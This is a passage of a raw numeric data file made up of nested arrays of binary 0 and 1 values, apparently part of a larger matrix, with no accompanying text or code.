1,1,1,1,0,1,1,0,0,1,1,1,1,1,1,0,0,1,1,1,0,1,0,0,0,1,0,1,1,1,1,1,1,1,0,0,1,0,1,1,1,1,1,0,0,0,1,1,0,0,1,0,1,1,0,1,0,0,0,1,0,0,0,0,1,1,1,0,1,1,0,1,0,1,0,1,0,0,0,0,0],[1,1,0,0,1,0,1,1,0,1,1,1,0,1,1,1,1,0,1,0,0,0,0,0,1,0,1,0,1,1,1,1,0,0,1,0,0,0,0,1,0,1,0,1,1,1,1,1,1,0,0,0,1,1,0,1,0,0,1,1,1,0,1,1,1,1,1,0,0,0,0,1,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,1,1,0,1,1,1,1,0,1,1,1,0,1,0,1,0,0,1,1,1,0,1,1,1,0,1,1,1,0,1,1,1,1,1,0,0,0,1,1,1,1,0,1,1,0,0,1,0,1,0,0,0,1,0,0,1,0,0,1,0,1,1,0,1,1,0,0,1,1,1,0,1,1,1,1,0,1,1,1,1,1,1,0,1,1,1,0,1,0,0,0,0,1,0,1,1,1,1,1,0,0,1,1,0,0,1,1,0,1,1,0,1,0,0,1,1],[0,0,0,0,1,0,0,0,0,0,0,0,1,1,0,1,1,0,0,1,1,0,0,1,1,1,1,0,0,0,1,0,0,0,1,1,1,1,0,0,0,1,0,1,1,1,1,0,0,1,0,1,0,0,1,0,0,0,1,0,0,1,1,1,0,1,1,1,0,0,1,0,0,0,0,0,0,1,0,1,1,0,0,1,1,1,1,1,1,0,1,0,1,0,1,1,1,1,0,1,1,1,0,0,0,1,0,1,0,1,0,1,1,
1,1,0,0,0,0,0,1,0,0,1,0,0,0,1,0,1,0,1,0,1,0,0,0,1,0,0,1,1,1,1,1,0,1,0,1,1,0,1,0,0,0,0,0,0,1,1,0,0,1,0,1,1,0,1,1,0,1,1,1,0,0,1,1,1,0,0,0,1,1,0,1,0,1,0,0,0,1,0,1,1,1,1,0,0,0,1,1,1,0],[1,0,0,0,0,1,0,0,0,1,0,0,1,1,0,1,1,1,1,1,0,1,1,0,0,0,1,1,0,1,1,1,0,0,0,1,1,0,1,0,1,1,0,1,1,0,0,0,1,0,1,0,0,0,1,0,0,1,0,0,1,0,1,0,1,0,1,1,0,1,0,1,0,0,0,0,0,0,1,1,1,0,0,1,1,0,0,0,1,1,1,0,1,0,1,1,1,0,1,1,0,1,0,0,1,0,1,1,1,1,1,0,1,1,0,1,0,1,1,0,1,0,1,1,1,0,0,0,1,1,0,0,0,1,1,1,0,0,1,1,0,1,0,1,1,1,1,0,0,1,1,0,0,1,1,1,1,0,1,1,0,1,0,0,0,1,0,0,1,0,0,1,1,0,0,1,0,1,1,1,0,0,1,1,0,0,1,0,1,0,1,0,0,1,0,0,0,0,1,1,0,0,1],[1,0,1,0,0,0,1,0,0,1,1,1,1,0,1,1,1,1,0,0,1,1,0,1,0,0,0,1,1,0,1,1,0,1,1,1,0,0,0,1,1,1,1,0,1,1,1,0,0,0,0,0,0,1,1,0,1,1,1,0,1,0,1,1,1,0,1,1,1,1,0,0,1,0,1,1,0,0,1,0,1,1,0,0,0,1,0,1,0,1,0,0,0,1,1,0,0,0,1,1,1,0,1,1,0,0,0,0,1,0,1,0,1,0,1,0,0,0,1,0,0,1,0,0,0,1,1,1,0,1,1,1,0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,0,1,0,1,0,0,0,1,1,1,0,1,1,0,0,1,0,0,0,1,1,0,1,1,1,1,1,1,0,1,0,0,0,0,1,1,1,1,0,1,1,0,1,1,0,1,1,1,0,1,1,1,1,0,0,0],[1,1,0,1,0,1,1,1,0,1,0,1,1,0,0,1,1,1,1,1,1,1,0,1,1,1,1,0,1,0,1,0,0,1,0,1,0,1,1,0,0,1,1,0,0,1,0,0,0,1,1,1,1,1,0,0,1,1,0,1,0,1,0,1,0,1,0,0,0,0,0,0,0,0,1,0,1,0,0,0,1,1,0,0,0,1,1,0,0,0,1,1,1,1,0,1,1,1,0,1,0,1,0,0,0,0,0,1,1,0,1,1,1,1,0,0,0,0,0,1,1,0,1,0,1,1,0,1,0,1,1,1,1,0,1,0,1,1,0,1,1,1,1,0,1,1,1,0,0,1,1,0,0,1,0,0,0,0,0,1,1,0,0,1,0,1,0,1,1,0,1,0,0,0,0,0,1,1,0,0,1,0,1,1,0,0,0,1,1,0,1,0,0,1,0,1,1,0,1,0,0,0,1],[0,0,0,0,1,1,1,0,1,0,0,0,0,0,0,0,1,0,1,0,1,1,1,0,0,0,1,1,0,0,0,0,1,1,0,0,0,1,1,1,1,0,0,0,0,1,0,1,0,1,0,1,0,0,0,1,1,0,1,1,1,0,0,0,0,1,1,1,0,1,1,1,0,1,0,1,0,0,1,1,1,1,1,1,1,0,1,1,0,1,1,0,0,1,0,0,1,1,0,1,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,1,0,0,0,1,1,1,0,0,0,1,1,0,0,0,0,1,0,0,0,1,0,0,1,0,0,1,1,1,1,0,0,0,1,0,1,0,0,0,0,1,1,0,0,1,1,1,1,0,0,1,0,1,1,1,0,1,1,0,0,1,0,1,1,0,0,1,0,1,1,0,1,0,1,1,1,1,0,0,0,1,0,1,0],[1,1,1,1,0,0,1,0,0,0,0,0,0,1,1,0,1,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,0,1,1,0,0,1,1,1,1,1,1,1,1,1,1,0,1,0,0,0,0,0,0,1,0,1,1,0,0,0,1,0,0,1,1,1,0,0,1,0,0,1,0,1,1,1,0,1,0,1,1,1,0,1,0,0,0,1,1,0,1,
1,1,1,0,0,0,1,0,1,0,1,0,1,1,1,0,1,0,0,0,1,0,0,0,1,0,1,1,0,0,0,0,1,1,1,1,1,0,0,0,0,1,0,1,1,0,1,1,0,0,1,0,0,0,1,1,1,1,0,1,0,0,0,1,1,0,0,0,0,1,0,0,0,0,0,1,0,1,0,1,0,1,0,0,1,1,0,1,0,1,0,1,1,0,0,0,0,0,1,0,0,1,0,1,1,0,1,0,1,0],[0,1,0,0,1,0,1,1,0,0,1,0,0,1,1,1,1,0,0,0,0,0,0,0,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,1,1,1,0,0,0,1,0,1,0,0,0,0,0,0,1,1,0,0,1,0,1,1,1,1,0,1,0,0,1,1,0,0,0,1,1,0,0,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,0,1,0,1,1,1,1,1,0,1,1,1,0,0,0,0,0,1,0,1,0,1,1,0,0,0,1,0,1,0,0,0,1,0,1,0,0,1,0,1,1,1,0,1,1,0,0,1,0,1,1,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,1,0,0,0,1,0,1,1,1,0,0,1,1,0,0,0,1,0,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1],[0,0,1,1,0,0,0,1,1,0,0,1,1,0,0,1,1,1,0,1,1,0,0,1,0,0,0,1,1,1,0,1,1,0,1,0,1,0,1,1,1,1,0,1,1,1,1,0,1,1,0,0,1,1,1,0,1,1,0,0,0,1,0,1,0,1,0,0,1,0,1,0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,1,1,1,1,1,0,1,1,1,1,0,0,0,1,1,0,0,0,1,1,0,0,1,0,1,1,1,1,0,1,0,0,1,1,0,0,0,1,1,1,0,1,0,1,1,0,0,0,1,1,1,1,0,1,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,1,0,1,1,0,0,1,0,1,0,0,1,1,1,1,0,1,0,0,0,1,1,0,0,0,1,0,1,0,1,1,0,1,1,1,0,0,1,1,0,1,1,0,1,0],[0,0,1,1,1,1,1,0,1,1,1,0,1,0,1,1,0,0,1,0,0,1,0,1,1,0,1,1,1,1,1,1,0,1,1,0,0,1,0,1,1,1,0,1,0,1,0,0,0,0,0,1,0,0,1,0,0,0,1,1,0,1,1,0,0,0,1,1,0,1,1,0,0,0,0,0,0,0,1,0,1,0,1,0,1,1,0,1,1,1,1,1,0,1,0,0,1,0,0,0,1,1,1,1,0,1,0,0,1,1,0,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,1,1,1,0,0,0,1,0,0,0,0,1,1,1,1,1,1,0,1,1,0,0,0,0,0,1,0,0,0,1,1,0,1,1,0,0,0,1,1,0,0,0,0,1,0,0,0,1,0,1,0,1,1,0,1,1,1,0,0,1,1,0,1,0,1,0,0,1,1,1,1,1,0,0,1,1],[0,1,1,0,1,1,1,0,1,1,0,0,0,1,1,0,1,1,0,0,1,0,1,0,1,0,0,1,1,1,1,1,1,1,0,1,0,0,0,0,1,1,1,0,1,1,0,1,0,1,0,1,0,1,1,1,0,0,0,0,0,1,0,0,1,0,0,0,1,0,1,1,1,0,1,0,0,0,1,0,1,1,0,0,1,0,0,0,0,1,1,0,0,0,1,1,0,1,0,0,0,1,0,0,0,0,0,0,1,1,0,1,0,0,1,0,1,0,1,1,1,0,0,1,1,1,0,1,0,0,0,0,0,1,1,1,1,1,0,1,0,0,0,1,1,1,1,1,0,0,0,0,1,1,1,0,0,0,1,0,0,0,1,0,0,0,1,1,1,1,0,1,1,1,0,1,0,1,0,0,0,0,0,1,0,0,1,0,1,0,0,1,0,0,1,1,1,0,1,1,1,1,1],[0,1,1,1,0,0,1,0,1,0,1,0,0,0,0,0,0,0,1,0,0,1,1,1,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,1,0,0,1,1,1,1,0,0,0,0,1,0,1,0,0,0,1,0,1,1,1,0,0,0,0,1,0,1,0,0,0,
1,0,0,0,0,0,1,1,1,1,1,0,1,1,0,0,1,0,1,1,1,0,1,0,1,1,1,0,0,1,0,0,1,1,0,1,0,1,1,0,1,0,1,0,1,0,1,0,0,1,1,1,0,1,1,1,1,0,0,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,1,0,0,1,1,1,0,1,1,0,1,0,1,0,0,0,0,0,1,0,1,0,0,0,1,1,1,0,0,0,1,0,1,0,0,1,1,0,0,1,1,0,1,1,1,0,0,0,0,0,1,0,1],[1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,0,0,1,0,1,1,1,0,1,0,0,1,0,1,1,0,1,0,1,0,1,1,1,0,0,0,1,1,1,0,1,1,1,0,0,1,0,0,0,0,1,1,0,1,1,0,0,1,1,0,0,1,0,1,1,0,0,0,1,1,1,1,0,0,1,0,0,1,1,1,0,1,1,1,0,1,1,1,1,0,1,0,1,0,0,0,0,1,0,1,1,1,0,1,1,0,0,0,1,0,0,0,0,0,0,1,1,1,1,0,0,0,1,0,0,0,0,0,1,1,1,1,1,1,1,1,0,1,1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,1,1,1,0,1,1,1,1,1,0,0,1,1,1,0,1,0,0,1,1,1,1,0,1,1,0,0,0,0,0,1,1,1,0,1,0,0,1,1,1,0,0,1,1,0],[1,1,0,1,1,0,0,0,1,1,0,0,1,0,0,1,1,1,1,0,1,0,1,1,0,1,1,1,0,1,1,1,1,1,1,1,0,0,0,0,0,1,0,0,0,1,0,1,1,1,1,0,1,1,0,1,1,0,0,0,0,1,0,1,1,1,1,0,1,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,1,1,0,1,0,0,0,1,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,1,1,0,1,1,1,0,0,0,0,1,0,1,1,0,0,0,1,1,0,1,1,1,1,1,1,0,1,0,1,0,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,1,0,1,1,1,1,1,1,0,1,1,0,0,1,0,0,0,1,0,1,0,1,0,1,0,0,1,1,0,0,1,1,1,0,0,0,1,0,1],[0,1,0,1,0,0,1,0,0,1,1,1,0,1,1,1,1,1,1,1,1,0,1,1,0,0,0,0,0,1,0,0,1,0,1,0,0,1,1,1,0,1,0,0,1,1,0,1,0,0,0,1,0,0,1,0,1,1,1,1,0,0,0,1,0,1,1,0,0,1,1,1,0,1,0,0,0,1,0,0,0,1,1,0,1,0,1,1,1,1,0,0,0,1,0,1,1,1,0,1,1,1,1,1,1,0,1,1,1,0,1,0,1,1,0,0,1,1,0,1,1,1,0,1,1,1,1,0,1,1,0,0,0,1,1,1,0,1,1,1,1,0,0,0,0,1,0,1,1,1,0,0,1,0,1,0,0,1,1,0,0,1,1,1,0,0,0,1,0,0,0,1,1,1,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,0,0,1,1,1,0,0,1,1,0,0,0,0],[1,1,1,0,1,0,0,1,1,1,1,0,1,1,0,0,1,0,0,1,1,0,1,1,1,1,0,1,0,1,1,1,1,0,1,0,1,0,0,1,0,1,1,0,1,0,0,1,1,1,0,1,0,1,1,0,0,1,0,0,1,0,0,0,1,0,0,0,1,1,1,1,0,0,0,0,0,0,0,1,1,0,0,1,0,1,1,0,1,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,1,1,0,1,1,0,1,0,0,1,1,1,1,1,0,0,0,1,1,0,0,1,1,1,0,0,1,1,0,0,1,1,0,1,0,0,1,0,0,1,1,1,1,0,1,0,1,1,0,1,1,1,0,1,0,0,1,1,1,0,0,0,0,1,0,1,1,0,0,1,0,1,0,1,1,0,1,0,0,0,1,1,0,1,0,1,0,0,0,1,0,1,0,1,1,0,1],[0,0,1,1,1,0,1,1,0,1,1,1,1,1,0,0,0,0,1,0,1,1,1,0,1,1,0,1,0,0,1,1,1,0,1,0,0,1,1,1,1,1,0,0,0,1,1,0,0,0,1,1,0,
1,1,1,1,1,1,0,1,0,1,1,1,1,1,0,1,1,1,1,1,0,1,0,0,1,0,1,0,1,0,0,0,0,1,0,0,0,1,1,1,0,0,1,0,1,1,1,1,0,0,1,1,0,0,0,1,1,0,1,0,0,1,1,1,0,0,0,0,1,1,1,1,1,1,0,1,1,0,0,1,1,0,0,1,1,0,0,0,1,1,0,1,0,0,1,1,1,1,1,0,0,1,0,0,1,1,0,1,1,1,1,0,0,0,1,1,1,0,0,0,0,0,0,1,1,1,1,1,0,0,0,0,0,1,1,0,1,1,1,0,0,0,1,1,1,0,0,0,1,0],[1,1,0,1,0,1,1,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,1,0,0,0,0,0,0,0,1,1,0,1,1,0,0,1,0,0,1,0,0,1,1,1,0,1,0,0,0,1,1,1,0,1,1,0,1,0,0,0,1,1,0,1,0,1,1,0,1,0,0,1,0,1,0,1,0,0,0,1,0,1,1,0,1,1,0,1,0,1,0,1,1,0,0,0,1,1,0,1,1,0,0,1,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,1,0,0,1,0,0,0,0,1,1,1,1,1,0,0,1,1,1,1,0,1,1,0,1,0,1,0,0,0,1,0,0,0,1,0,1,0,1,1,1,0,1,1,1,0,0,0,1,0,0,1,0,0,1,1,0,0,1,1,0,0,1,0,1],[1,1,0,0,0,0,0,0,1,1,1,0,0,1,0,0,1,1,0,0,0,1,0,1,1,1,1,1,1,0,1,1,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,0,1,1,1,0,1,0,0,0,1,0,0,0,1,0,0,1,1,1,0,0,0,1,0,0,0,1,0,1,1,1,1,0,0,0,0,1,0,1,1,0,1,0,0,0,1,0,1,1,1,1,0,1,1,1,1,0,0,1,1,1,0,0,1,1,0,0,1,0,0,0,1,0,0,1,0,0,1,0,0,0,0,1,0,0,1,1,0,0,0,1,1,0,0,1,0,1,0,1,0,1,1,0,1,1,0,1,0,1,1,0,0,1,0,1,1,1,0,0,1,1,0,0,0,1,1,0,1,0,1,0,1,0,1,1,1,0,0,1,1,0,0,0,0,1,0,1,1,0,0,0,0,1,1,0,0],[1,1,0,1,0,1,0,1,1,1,0,0,0,1,0,0,0,0,1,0,0,1,0,1,1,0,1,0,1,0,0,0,1,0,1,0,1,0,1,1,1,1,0,0,0,0,0,0,0,1,1,0,1,0,0,1,1,1,1,0,0,1,1,1,1,1,0,1,0,1,0,1,1,1,0,0,0,0,0,1,1,0,1,1,1,1,0,0,1,0,0,0,1,0,0,1,0,0,1,1,1,0,1,1,0,0,1,1,1,0,1,0,0,1,1,1,1,0,0,0,1,1,0,0,0,0,1,0,0,0,1,1,1,1,0,0,1,1,1,1,1,1,1,1,0,0,0,1,0,0,1,1,1,1,0,1,1,1,1,0,0,0,0,1,0,1,1,1,0,0,1,0,1,1,1,1,1,1,1,0,0,0,0,1,0,0,1,1,1,1,1,0,1,0,0,0,0,1,0,1,0,1,0],[0,1,1,1,0,0,1,1,0,1,1,1,0,1,1,1,0,0,0,0,0,1,0,1,0,0,0,0,0,0,1,1,1,0,1,0,1,1,0,0,1,1,0,1,0,0,0,1,1,1,1,1,1,0,1,1,0,0,1,0,1,0,1,1,1,0,1,0,0,0,1,1,0,0,0,1,1,0,1,0,1,1,0,0,0,0,0,1,0,0,1,0,0,1,0,0,1,0,0,1,0,1,1,0,1,1,0,1,1,0,0,0,1,0,1,0,1,1,1,1,0,0,1,0,1,1,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,1,1,0,0,1,1,1,1,0,0,1,0,0,1,0,0,0,0,0,0,1,0,1,1,1,0,1,0,0,0,0,0,1,1,1,0,0,0,1,0,1,1,1,1,0,1,0,1,1,1,1,1,1,1,1,1,1,1],[0,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,1,1,0,1,0,0,1,0,1,0,1,1,0,0,1,
0,1,0,1,1,0,0,1,1,0,1,0,1,1,1,1,0,1,0,1,1,1,1,0,1,0,1,0,0,0,1,0,0,0,0,0,1,1,0,1,1,1,1,0,0,0,1,1,0,0,0,0,1,0,0,1,1,1,1,1,1,0,1,0,1,0,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,1,0,1,0,0,0,1,0,0,1,1,0,0,1,1,1,1,1,0,1,0,0,1,0,0,0,1,1,1,0,0,0,0,0,0,0,1,1,0,1,1,0,1,1,0,1,0,1,0,1,1,0,1,1,0,1,1,0,0,1,0,0,1,0,1,0,1,1,0,1,0,0,0,0,0,1,0,1,0,1],[1,1,0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,0,1,0,0,1,1,0,1,1,0,0,1,1,1,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,1,0,0,0,1,0,1,1,1,0,0,1,1,1,0,0,0,1,1,0,0,0,0,0,1,1,1,0,1,0,1,0,0,1,1,1,1,1,1,1,0,1,1,0,0,1,0,1,0,0,0,1,0,1,1,1,0,0,0,0,0,1,0,0,1,0,1,0,1,0,0,1,0,1,1,0,1,1,1,1,1,0,0,1,1,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,1,1,0,1,0,1,0,0,0,1,1,0,1,0,1,1,0,1,0,0,0,1,0,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1],[0,1,1,1,1,0,0,1,1,1,0,0,1,0,1,0,0,1,0,1,1,0,1,1,1,1,0,0,1,1,0,0,0,1,0,1,1,1,1,1,0,1,0,1,0,0,0,0,0,0,1,1,1,1,0,1,1,0,0,0,1,1,0,1,1,0,1,0,1,0,0,1,1,0,0,1,0,0,1,0,0,0,0,1,0,0,0,1,0,1,0,0,1,0,1,0,0,1,0,0,1,1,1,0,1,0,1,1,0,0,1,1,0,0,1,0,1,1,1,0,0,0,1,1,0,1,1,0,1,0,0,1,1,0,1,0,0,0,1,1,1,0,1,0,1,0,0,1,0,0,0,1,1,1,0,0,0,0,1,1,1,1,1,1,0,1,1,1,1,0,0,0,1,0,0,1,1,0,1,0,0,1,1,0,1,1,0,1,0,1,1,0,1,1,0,0,0,0,1,0,1,0,0],[1,1,1,0,1,1,1,1,1,0,0,1,0,1,0,0,1,0,0,1,0,1,1,0,1,1,1,0,0,1,0,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,1,1,0,1,1,0,0,1,1,1,1,0,0,0,0,1,0,1,0,0,0,1,0,1,0,0,1,1,0,1,1,0,0,1,1,1,1,1,0,1,0,0,0,1,0,0,0,0,0,0,1,0,1,0,1,0,1,0,0,0,1,1,1,1,1,0,1,0,0,0,0,1,1,0,0,1,0,1,0,0,1,1,1,1,0,1,0,1,0,0,0,1,0,1,1,1,0,0,0,0,0,1,1,1,0,1,0,0,0,1,1,1,1,1,1,1,1,0,0,1,0,0,0,0,1,0,0,0,0,1,0,1,0,1,1,1,0,0,1,0,0,1,1,0,0,1],[1,1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,1,0,1,1,0,0,0,1,1,0,1,0,1,0,0,1,0,0,0,1,1,0,0,0,0,1,0,0,0,0,0,1,1,0,1,0,1,0,0,0,1,1,0,0,0,1,0,1,0,1,0,1,1,1,1,0,0,1,0,0,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,1,0,1,1,0,1,0,1,0,1,0,1,0,1,0,1,1,1,0,1,0,0,1,0,0,1,1,1,1,1,1,1,1,0,0,0,1,1,0,1,1,0,0,0,1,1,0,1,1,0,1,0,1,0,1,0,1,0,0,0,1,1,1,0,1,1,1,0,0,1,1,0,0,0,1,1,1,1,1,0,0,0,1,1,1,0,1,0,0,1,0,0,1,1,0,1,1,1],[0,0,0,1,1,1,1,1,1,1,1,1,0,
0,0,0,0,0,0,0,1,0,0,1,0,1,1,1,1,1,0,0,0,1,0,0,1,0,0,0,0,1,1,1,1,1,0,1,1,1,0,0,0,1,1,0,0,0,0,0,0,1,0,1,0,0,1,1,0,1,1,1,0,1,0,1,1,0,1,0,1,1,1,0,1,0,0,0,0,1,1,1,0,0,0,1,1,0,0,0,1,0,1,1,1,0,1,0,1,0,0,0,1,0,0,1,1,1,0,1,0,1,1,0,1,0,1,0,1,0,1,1,1,0,1,1,0,0,1,1,0,0,0,0,0,1,1,1,0,0,1,0,1,0,0,0,0,1,1,1,0,1,1,0,0,1,0,1,1,0,0,1,0,1,1,0,1,0,1,0,1,1,1,1,0,0,0,0,1,0,1,1,0,0,0,1,0,0,1,0,0,0,0],[0,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,0,1,0,0,1,0,1,1,0,1,0,1,1,0,1,0,0,0,0,1,0,0,1,0,0,1,1,0,1,0,0,0,1,1,0,0,1,0,1,1,1,0,0,1,0,1,1,0,0,0,0,0,1,0,1,0,0,0,0,1,1,0,0,1,0,0,1,0,1,0,0,0,0,1,0,1,0,1,0,0,1,0,1,1,1,0,1,0,1,0,1,1,0,0,0,1,0,0,0,1,0,0,0,0,0,1,1,0,0,0,1,0,1,1,1,0,0,0,1,1,0,1,1,0,0,1,0,0,1,1,1,1,0,0,1,0,1,0,1,1,1,1,0,0,0,0,1,1,0,1,1,0,1,0,0,0,1,1,0,0,0,1,1,1,0,0,1,0,0,0,1,1,1,1,0,1,1,1,1,1,0,1,0,1,1,1,0],[0,1,1,0,1,1,1,1,1,1,1,1,0,1,0,1,0,0,0,0,0,1,1,1,1,0,0,0,0,1,1,1,0,1,1,0,0,0,1,1,0,0,1,1,1,0,1,1,0,0,1,0,1,0,0,0,0,1,0,0,1,1,1,0,1,1,1,0,1,1,1,1,0,1,0,1,1,0,1,1,1,1,1,1,0,1,1,0,1,0,0,0,1,1,1,1,0,0,1,1,0,0,1,0,0,1,0,1,1,0,1,1,0,0,1,1,1,0,1,1,1,1,1,0,1,1,0,0,0,0,0,0,1,0,1,1,1,0,1,0,0,1,0,1,0,1,1,1,0,0,0,0,1,0,0,1,1,0,1,1,0,0,1,0,0,0,0,0,1,1,1,0,0,1,1,0,1,1,1,0,0,0,1,1,0,1,0,0,0,1,1,1,0,1,0,0,1,1,1,1,0,0,0],[1,1,0,0,0,0,0,1,0,0,1,1,1,1,0,1,0,1,0,1,1,0,0,0,1,1,0,1,1,0,1,1,0,0,1,0,1,1,0,1,0,0,0,1,1,1,1,1,0,1,1,0,0,0,1,0,0,1,1,0,1,0,1,0,1,1,1,1,1,0,1,1,1,0,1,0,1,0,0,1,1,0,0,1,0,1,1,0,1,0,0,0,1,1,1,0,1,1,0,1,0,0,0,0,1,1,1,0,0,0,1,1,0,1,1,1,1,0,0,1,0,0,1,1,0,0,1,0,1,1,0,0,0,0,1,1,0,0,0,0,0,1,1,0,0,1,0,1,1,0,1,1,0,0,0,0,0,0,1,0,0,1,0,1,1,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,1,0,0,1,1,1,1,1,1,0,0,0,1,0,1,0,0,0,0,0,0,1,0],[0,1,1,0,1,1,0,1,0,1,1,0,0,1,0,0,1,0,0,1,1,1,0,1,1,1,0,1,1,0,0,0,0,0,1,1,0,1,1,1,1,0,1,1,1,0,1,0,0,1,1,0,1,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,1,0,0,1,1,1,0,1,1,0,1,1,1,0,1,1,1,0,1,1,1,0,1,0,1,1,0,0,0,1,0,1,1,1,1,1,0,1,0,1,0,1,1,0,1,1,0,1,0,0,1,1,1,1,0,1,1,0,1,0,1,1,0,1,1,0,1,1,1,1,0,0,1,1,1,0,1,0,1,0,1,1,1,1,0,1,1,1,0,0,1,0,0,1,0,1,1,0,0,0,1,1,1,1,0,1,0,0,0,1,1,0,0,0,1,0,1,0,0,1,1,1,0,1,1,0,0,0,
1,1,0,0,1,0],[0,0,0,0,0,1,1,0,1,1,1,1,1,1,0,1,0,1,0,0,1,0,0,1,1,1,1,0,1,0,0,1,0,1,1,0,1,0,1,1,1,0,0,0,1,0,1,0,1,1,0,1,0,1,1,1,1,0,1,0,0,0,0,1,0,0,1,0,1,1,0,0,0,1,1,1,0,0,0,1,0,0,1,1,0,0,0,0,0,0,1,1,0,0,0,0,1,1,0,1,1,0,0,1,0,0,1,1,1,1,0,0,1,0,0,0,0,1,1,0,1,1,1,1,1,1,0,0,0,1,0,0,1,0,1,1,0,0,0,1,0,1,1,1,1,0,0,1,0,0,0,1,1,1,0,0,0,0,1,0,0,1,1,0,1,1,0,1,0,1,1,1,0,1,0,1,0,1,1,1,0,0,0,0,1,0,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,0],[1,1,0,0,0,0,0,1,1,1,0,1,0,0,0,0,0,1,0,1,0,0,1,0,1,1,1,0,1,1,0,0,1,1,1,0,1,0,1,1,1,0,0,1,1,1,0,1,1,0,1,1,1,0,0,0,1,1,0,0,0,0,1,0,1,1,1,1,1,1,0,1,1,1,1,0,1,0,0,1,1,1,0,0,0,1,0,0,0,1,1,1,0,0,0,1,1,1,0,0,1,1,0,1,1,1,0,0,0,1,0,1,1,0,0,1,0,1,1,0,1,1,0,0,0,1,1,0,0,0,0,1,1,1,0,1,0,0,0,1,0,0,0,1,1,1,1,0,1,0,1,0,1,0,0,1,1,1,0,0,1,0,0,0,1,1,0,1,1,1,1,0,0,1,1,0,1,1,1,0,1,0,1,0,1,1,0,0,1,1,0,0,1,0,0,1,1,0,1,1,0,1,1],[1,1,1,0,0,1,0,1,0,0,1,0,0,0,1,1,0,1,1,1,1,1,0,1,0,0,1,1,0,1,1,1,1,1,1,0,1,0,1,1,1,0,1,1,1,0,1,1,0,0,0,0,1,0,0,0,0,1,0,0,1,0,0,0,0,1,1,1,0,0,0,1,0,0,1,0,0,1,0,1,1,1,0,0,1,0,0,0,0,1,0,1,1,1,0,0,1,0,1,0,1,0,1,0,0,1,0,1,1,1,1,0,1,0,1,1,0,0,0,0,0,1,0,0,0,1,1,0,1,0,1,1,1,1,1,1,1,0,1,0,1,0,1,1,0,1,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,0,1,1,1,0,0,1,1,0,0,1,0,0,0,1,0,0,1,1,1,0,1,0,1,0,0,1,1,1,0,1,0,0,0,1,0,1,0,0],[0,1,1,1,1,0,0,1,1,1,0,1,1,1,0,1,1,1,1,0,1,0,1,0,1,1,1,1,0,1,1,1,1,1,1,0,0,1,1,0,1,1,0,0,0,1,1,1,0,1,1,1,1,0,1,1,0,0,0,0,0,0,0,1,1,1,1,0,0,1,1,0,1,1,0,0,0,1,1,1,1,0,0,0,1,1,0,1,0,1,0,1,0,0,0,0,1,1,1,1,1,1,0,1,0,0,0,1,0,0,1,1,1,1,0,1,0,1,1,0,0,0,1,0,1,1,0,0,0,0,0,1,1,0,0,1,1,1,0,0,0,0,1,1,0,1,0,0,0,1,1,1,0,1,1,0,1,0,0,1,0,0,0,1,0,0,1,1,0,0,1,1,1,0,0,1,1,1,0,0,1,0,0,1,1,0,1,1,0,1,0,1,0,1,0,0,1,1,1,1,0,1,0],[0,1,0,1,0,0,0,0,0,0,1,1,1,1,1,0,0,1,1,1,1,1,1,0,0,0,0,1,0,0,1,1,0,1,1,1,1,0,1,0,1,1,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,1,1,0,1,1,0,0,1,0,1,0,0,1,1,0,1,1,0,0,1,1,0,0,1,1,1,0,1,1,0,0,1,0,0,0,0,1,0,0,1,1,0,0,0,1,0,1,0,1,0,1,0,0,0,1,0,1,0,0,1,1,0,0,0,0,1,0,0,0,1,1,0,1,0,1,0,0,1,1,0,0,1,0,0,1,0,0,1,1,0,0,0,1,0,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,1,0,1,1,1,1,0,
